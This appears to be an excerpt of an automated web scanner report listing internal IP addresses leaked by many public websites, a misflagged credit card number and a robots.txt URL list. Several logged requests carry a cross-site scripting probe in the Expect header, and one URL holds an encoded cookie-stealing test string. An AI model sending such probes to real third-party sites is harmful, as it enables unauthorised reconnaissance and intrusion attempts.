HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.49.127
X-Cnection: close
Date: Tue, 03 May 2011 16:06:36 GMT
Content-Length: 58
Elapsed: 0.014

Given URL is not allowed by the Application configuration.

24.22. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.48.119

Request

Response

24.23. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.38.83

Request

Response

24.24. http://www.festfoods.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.festfoods.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.104

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.festfoods.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1490493616
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 10:46:04 GMT
Via: 1.1 varnish 172.17.34.104
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.25. http://www.getgrantinfo.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.getgrantinfo.net
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.19.60

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.getgrantinfo.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 414691334
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 10:59:13 GMT
Via: 1.1 varnish 172.17.19.60
Connection: Keep-Alive
Age: 0
Content-Length: 484

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.26. http://www.greatnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greatnow.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.100.12

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:22:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Cache: MISS from squid2.0catch.com
Connection: close


...[SNIP]...

24.27. http://www.gtlakes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gtlakes.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.2.157

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gtlakes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 403774240
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 10:33:04 GMT
Via: 1.1 varnish 172.17.2.157
Connection: Keep-Alive
Age: 0
Content-Length: 484

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.28. http://www.jcpamericanlivingtour.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jcpamericanlivingtour.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.3.23

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jcpamericanlivingtour.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1119853602
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 11:11:15 GMT
Via: 1.1 varnish 172.17.3.23
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.29. http://www.justgiving.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.justgiving.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.110.247

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.justgiving.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 2462
Content-Type: image/x-icon
Last-Modified: Wed, 27 Apr 2011 16:07:57 GMT
Accept-Ranges: bytes
ETag: "65e1dc45f54cc1:95c1"
Server: Microsoft-IIS/6.0
server: 192.168.110.247
X-Powered-By: ASP.NET
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 03 May 2011 11:29:54 GMT

............ .. ......(.......0..... .....` ...................................................P>`.Q>P.Q?..P>..Q>..P>..P>P.Q>`.....................................................Q? .Q>0.Q?..Q>..Q>..P
...[SNIP]...

24.30. http://www.lacounty.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lacounty.info
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.48.134.61

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lacounty.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

24.31. http://www.letusreason.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.letusreason.org
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.11.7

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letusreason.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/7.0
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 1245
Date: Tue, 03 May 2011 11:22:24 GMT
X-Varnish: 624072407
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

24.32. http://www.medcitynews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.medcitynews.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.66.109

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medcitynews.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 790348118
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 11:04:45 GMT
Via: 1.1 varnish 172.17.66.109
Connection: Keep-Alive
Age: 0
Content-Length: 484

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.33. http://www.menstuff.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.menstuff.org
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.11.23

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.menstuff.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 803366021
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 10:31:48 GMT
Via: 1.1 varnish 172.16.11.23
Connection: Keep-Alive
Age: 0
Content-Length: 484

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.34. http://www.nextgenwalkthroughs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nextgenwalkthroughs.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.66.59

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextgenwalkthroughs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Apache/2.2
Cache-Control: max-age=1
Content-Type: text/html; charset=iso-8859-1
Location: http://nextgenwalkthroughs.com/favicon.ico
Expires: Tue, 03 May 2011 11:31:55 GMT
Content-Length: 331
Date: Tue, 03 May 2011 11:31:54 GMT
X-Varnish: 294578296
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.66.59
X-Cache: MISS

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://nextgenwalkthrou
...[SNIP]...

24.35. http://www.nextmark.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nextmark.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.35.41

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextmark.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 606146112
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 10:44:25 GMT
Via: 1.1 varnish 172.17.35.41
Connection: Keep-Alive
Age: 0
Content-Length: 484

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.36. http://www.ocfl.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ocfl.net
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.255.102

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ocfl.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

24.37. http://www.sew4home.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sew4home.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.2.234

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sew4home.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:38:57 GMT
Server: Apache/2.2
Content-Type: text/html; charset=iso-8859-1
Location: http://sew4home.com/favicon.ico
Content-Length: 309
X-Varnish: 1085112480 1085110577
Age: 24
Via: 1.1 varnish 172.17.2.234
X-Cache: HIT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://sew4home.com/fav
...[SNIP]...

24.38. http://www.sugardoodle.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sugardoodle.info
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.106

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sugardoodle.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 345749287
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 10:18:27 GMT
Via: 1.1 varnish 172.17.34.106
Connection: Keep-Alive
Age: 0
Content-Length: 484

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.39. http://www.themat.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.themat.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.35.19

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.themat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 914937423
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 10:28:17 GMT
Via: 1.1 varnish 172.17.35.19
Connection: Keep-Alive
Age: 0
Content-Length: 484

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.40. http://www.visitsouth.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.visitsouth.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.3.158

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.visitsouth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

24.41. http://www.wdasfm.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wdasfm.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.9.10.98

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wdasfm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

25. Credit card numbers disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teriskitchen.com
Path:	/favicon.ico

Issue detail

The following credit card number was disclosed in the response:

4133603309493875

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teriskitchen.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:38:45 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27 PHP/4.2.3 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.11 OpenSSL/0.9.6g
Last-Modified: Mon, 20 Jul 2009 18:43:52 GMT
ETag: "679a8d-24e4-4a64bae8"
Accept-Ranges: bytes
Content-Length: 9444
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>Teri's Kitchen - Missing File</TITLE>
<META NAME="keywords" CONTENT="food, recipes, cooking, recipe, family recipes, cooking recipes, recipe collection, traditional recipes, it
...[SNIP]...

...[SNIP]...
<input type="hidden" name="cx" value="partner-pub-4133603309493875:owa5m1-4b4r" />
...[SNIP]...

...[SNIP]...

...[SNIP]...

26. Robots.txt file previous next
There are 1181 instances of this issue:

http://a.tribalfusion.com/displayAd.js
http://ad.doubleclick.net/ad/tnews.lee.net/
http://ad.turn.com/server/pixel.htm
http://ads.pointroll.com/PortalServe/
http://ads.specificmedia.com/serve/v=5
http://as.casalemedia.com/j
http://b.scorecardresearch.com/b
http://b.voicefive.com/b2
http://c.betrad.com/surly.js
http://cache.specificmedia.com/creative/blank.gif
http://cdn.optmd.com/blank.html
http://cdn.turn.com/server/ddc.htm
http://cm.g.doubleclick.net/pixel
http://cms.quantserve.com/dpixel
http://crl.geotrust.com/crls/secureca.crl
http://d.xp1.ru4.com/activity
http://d13.zedo.com/OzoDB/cutils/R53_5/jsc/1190/zpu.html
http://d3.zedo.com/jsc/d3/ff2.html
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js
http://feeds.bbci.co.uk/news/rss.xml
http://idpix.media6degrees.com/orbserv/hbpix
http://img0.yardbarker.com/media/f/8/f832476d611c0dd18e2d227a2c52ddeb172fe41a/footer_story/charlie-batch.jpg
http://img1.yardbarker.com/media/e/a/ea5193d9ec768455228a325516c165fd5e1f9b08/footer_story/Kansas_City_Chiefs_aab2.jpg
http://img2.yardbarker.com/media/4/0/405e6a02aee3eecae135f27fbf734dcc55320c07/medium/Philadelphia_Eagles_v_d8c9.jpg
http://img3.yardbarker.com/media/f/0/f000fbdc84ba51062eb26c6ba07cf0c827a59f4a/footer_story/Baltimore_Ravens_v_79ff.jpg
http://jkleman.townnews.com/media4/mcfarland/service/right_small.swf
http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673
http://m1.zedo.com/log/p.gif
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif
http://r.turn.com/r/bd
http://r1-ads.ace.advertising.com/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1
http://spe.atdmt.com/ds/DECHOJANSLEE/Lee_Misses_Shopphobia_9_7_10/lee_shopphobic_men_300x250_35k_v3a.jpg
http://speed.pointroll.com/PointRoll/Media/Banners/USCellular/865245/USC_familyplan_eric_300x250.gif
http://sync.mathtag.com/sync/img
http://tag.admeld.com/pixel
http://tag.contextweb.com/TagPublish/getjs.aspx
http://turn.nexac.com/r/pu
http://us.bc.yahoo.com/b
http://www.1-800-volunteer.org/favicon.ico
http://www.123-reg.co.uk/favicon.ico
http://www.1280.com/favicon.ico
http://www.181.fm/favicon.ico
http://www.1920s-fashion-and-music.com/favicon.ico
http://www.2-clicks-stamps.com/favicon.ico
http://www.20minutos.es/favicon.ico
http://www.2u.ru/favicon.ico
http://www.321gold.com/favicon.ico
http://www.3btech.net/favicon.ico
http://www.3reef.com/favicon.ico
http://www.3stepads.com/favicon.ico
http://www.411.info/favicon.ico
http://www.4miche.com/favicon.ico
http://www.4strokes.com/favicon.ico
http://www.610wtvn.com/favicon.ico
http://www.6url.com/favicon.ico
http://www.971zht.com/favicon.ico
http://www.aaaoklahoma.com/favicon.ico
http://www.aaaorid.com/favicon.ico
http://www.aaaxvdo.tk/favicon.ico
http://www.aatkingdom.net/favicon.ico
http://www.abbee.com/favicon.ico
http://www.abc6onyourside.com/favicon.ico
http://www.aboutarc.com/favicon.ico
http://www.aboutnursing.com/favicon.ico
http://www.abzolute.net/favicon.ico
http://www.access2wellness.com/favicon.ico
http://www.activehire.com/favicon.ico
http://www.actonsoftware.com/favicon.ico
http://www.add123.com/favicon.ico
http://www.adeptr.com/favicon.ico
http://www.adhostingsolutions.com/favicon.ico
http://www.adnet.de/favicon.ico
http://www.adsomega.com/favicon.ico
http://www.adstormer.com/favicon.ico
http://www.aerotrader.com/favicon.ico
http://www.afciviliancareers.com/favicon.ico
http://www.agoraquest.com/favicon.ico
http://www.airgunsofarizona.com/favicon.ico
http://www.alawar.ru/favicon.ico
http://www.albany.com/favicon.ico
http://www.algaecal.com/favicon.ico
http://www.aliciasrecipes.com/favicon.ico
http://www.allaboutdrawings.com/favicon.ico
http://www.allaboutjesuschrist.org/favicon.ico
http://www.allbran.com/favicon.ico
http://www.allegiance.com/favicon.ico
http://www.allentate.com/favicon.ico
http://www.allgame.com/favicon.ico
http://www.alltribes.com/favicon.ico
http://www.altermedia.info/favicon.ico
http://www.alttransport.com/favicon.ico
http://www.alvenda.com/favicon.ico
http://www.alvinisd.net/favicon.ico
http://www.am570radio.com/favicon.ico
http://www.amasci.com/favicon.ico
http://www.amazinavenue.com/favicon.ico
http://www.america-hijacked.com/favicon.ico
http://www.americancasinoguide.com/favicon.ico
http://www.americandiscountcruises.com/favicon.ico
http://www.americanmedical-id.com/favicon.ico
http://www.amsmeteors.org/favicon.ico
http://www.ancestralfindings.com/favicon.ico
http://www.animalbehaviorcollege.com/favicon.ico
http://www.animecastle.com/favicon.ico
http://www.animenfo.com/favicon.ico
http://www.antiquecar.com/favicon.ico
http://www.applianceguru.com/favicon.ico
http://www.appointmentquest.com/favicon.ico
http://www.appolicious.com/favicon.ico
http://www.aps.org/favicon.ico
http://www.aquabid.com/favicon.ico
http://www.aquariumguys.com/favicon.ico
http://www.areaguides.net/favicon.ico
http://www.arteryhealthinstitute.com/favicon.ico
http://www.artscraftsshowbusiness.com/favicon.ico
http://www.artvoice.com/favicon.ico
http://www.ashmax.com/favicon.ico
http://www.ashop.com.au/favicon.ico
http://www.asianage.com/favicon.ico
http://www.askdocweb.com/favicon.ico
http://www.askdramy.com/favicon.ico
http://www.askthetrainer.com/favicon.ico
http://www.astrazeneca-us.com/favicon.ico
http://www.ataglance.com/favicon.ico
http://www.atariage.com/favicon.ico
http://www.atlanta.net/favicon.ico
http://www.auctionadmin.com/favicon.ico
http://www.auntbugs.com/favicon.ico
http://www.auristechnology.com/favicon.ico
http://www.automationdirect.com/favicon.ico
http://www.automobilesreview.com/favicon.ico
http://www.autosupplyco.com/favicon.ico
http://www.azandmeapp.com/favicon.ico
http://www.azkidsnet.com/favicon.ico
http://www.b92.net/favicon.ico
http://www.babbittsonline.com/favicon.ico
http://www.babynamescountry.com/favicon.ico
http://www.babynamespedia.com/favicon.ico
http://www.backgroundlabs.com/favicon.ico
http://www.bagsnob.com/favicon.ico
http://www.bagsunlimited.com/favicon.ico
http://www.bakersfieldcollege.edu/favicon.ico
http://www.bankruptcyinformation.com/favicon.ico
http://www.bankserv.com/favicon.ico
http://www.barnettharley.com/favicon.ico
http://www.baylinerownersclub.org/favicon.ico
http://www.bbing.org/favicon.ico
http://www.bbspot.com/favicon.ico
http://www.bcbsga.com/favicon.ico
http://www.beangroup.com/favicon.ico
http://www.beautifulcervix.com/favicon.ico
http://www.bebelsecurity26.com/favicon.ico
http://www.belcan.com/favicon.ico
http://www.beloblog.com/favicon.ico
http://www.best-running-tips.com/favicon.ico
http://www.bestbuypoolsupply.com/favicon.ico
http://www.bestwesternmichigan.com/favicon.ico
http://www.betfirms.com/favicon.ico
http://www.bhgrealestate.com/favicon.ico
http://www.big1059.com/favicon.ico
http://www.bigbrotheraccess.com/favicon.ico
http://www.bigcatcountry.com/favicon.ico
http://www.bignewsnetwork.com/favicon.ico
http://www.bikebling.com/favicon.ico
http://www.biloxi.ms.us/favicon.ico
http://www.bimvid.com/favicon.ico
http://www.black-friday.net/favicon.ico
http://www.blackpast.org/favicon.ico
http://www.blackshoediaries.com/favicon.ico
http://www.blippitt.com/favicon.ico
http://www.bloomu.edu/favicon.ico
http://www.bobthebuilder.com/favicon.ico
http://www.bookmaker.com/favicon.ico
http://www.booksonboard.com/favicon.ico
http://www.booksshouldbefree.com/favicon.ico
http://www.boomboomflicks.com/favicon.ico
http://www.boomkat.com/favicon.ico
http://www.borla.com/favicon.ico
http://www.boyunknown.com/favicon.ico
http://www.boyvipdream.com/favicon.ico
http://www.bravewords.com/favicon.ico
http://www.brazilianbikinishop.com/favicon.ico
http://www.breastfeeding.com/favicon.ico
http://www.brenhambanner.com/favicon.ico
http://www.brighthorizons.com/favicon.ico
http://www.broadbandinfo.com/favicon.ico
http://www.broadbandsports.com/favicon.ico
http://www.brostoons.com/favicon.ico
http://www.brusselsjournal.com/favicon.ico
http://www.btdirect.com/favicon.ico
http://www.buildlastingsuccess.com/favicon.ico
http://www.bullied-by-her-dad.info/favicon.ico
http://www.burton.com/favicon.ico
http://www.buymebeauty.com/favicon.ico
http://www.cabinetparts.com/favicon.ico
http://www.cabinsusa.com/favicon.ico
http://www.cafe.com/favicon.ico
http://www.cajungrocer.com/favicon.ico
http://www.calvary-kids-pages.com/favicon.ico
http://www.cambriacove.com/favicon.ico
http://www.campclearwater.com/favicon.ico
http://www.canalstreetchronicles.com/favicon.ico
http://www.caraddict4addicts.com/favicon.ico
http://www.cardschat.com/favicon.ico
http://www.careersandcolleges.com/favicon.ico
http://www.carolinarustica.com/favicon.ico
http://www.carpictures.com/favicon.ico
http://www.cascadedesigns.com/favicon.ico
http://www.cashexplosionshow.com/favicon.ico
http://www.cashstore.com/favicon.ico
http://www.casinator.com/favicon.ico
http://www.cayenne.com/favicon.ico
http://www.cbmove.com/favicon.ico
http://www.ccnow.com/favicon.ico
http://www.ccsdschools.com/favicon.ico
http://www.cdburnerxp.se/favicon.ico
http://www.celebies.com/favicon.ico
http://www.celebrific.com/favicon.ico
http://www.census-online.us/favicon.ico
http://www.centralmarket.com/favicon.ico
http://www.cerritos.edu/favicon.ico
http://www.charter-business.com/favicon.ico
http://www.chasing-fireflies.com/favicon.ico
http://www.cheaptalkwireless.com/favicon.ico
http://www.checkcity.com/favicon.ico
http://www.chefuniforms.com/favicon.ico
http://www.chemicalelements.com/favicon.ico
http://www.chicagohistory.org/favicon.ico
http://www.childdevelopmentinfo.com/favicon.ico
http://www.chnlove.com/favicon.ico
http://www.churchjobs.net/favicon.ico
http://www.churchleaderinsights.com/favicon.ico
http://www.cieaura.com/favicon.ico
http://www.cigarettemachines.net/favicon.ico
http://www.cirruscasino.net/favicon.ico
http://www.citrix.com/favicon.ico
http://www.citydeals.com/favicon.ico
http://www.classical.net/favicon.ico
http://www.classicsonline.com/favicon.ico
http://www.classicwordgames.com/favicon.ico
http://www.clevelandcountyschools.org/favicon.ico
http://www.clevelandgolf.com/favicon.ico
http://www.clubpogo.com/favicon.ico
http://www.cmsmallengines.net/favicon.ico
http://www.cnyric.org/favicon.ico
http://www.coincommunity.com/favicon.ico
http://www.collectibledetective.com/favicon.ico
http://www.collectorcarads.com/favicon.ico
http://www.collegecaptain.com/favicon.ico
http://www.collegeotr.com/favicon.ico
http://www.coloring-page.com/favicon.ico
http://www.columbus.gov/favicon.ico
http://www.com-sub.biz/favicon.ico
http://www.commerceinsurance.com/favicon.ico
http://www.concordmonitor.com/favicon.ico
http://www.concreteexchange.com/favicon.ico
http://www.conscallhome.com/favicon.ico
http://www.contentreserve.com/favicon.ico
http://www.copykatchat.com/favicon.ico
http://www.corporateboxoffice.com/favicon.ico
http://www.corvettecentral.com/favicon.ico
http://www.costcentral.com/favicon.ico
http://www.cowetaschools.org/favicon.ico
http://www.coxenterprises.com/favicon.ico
http://www.craigslist.at/favicon.ico
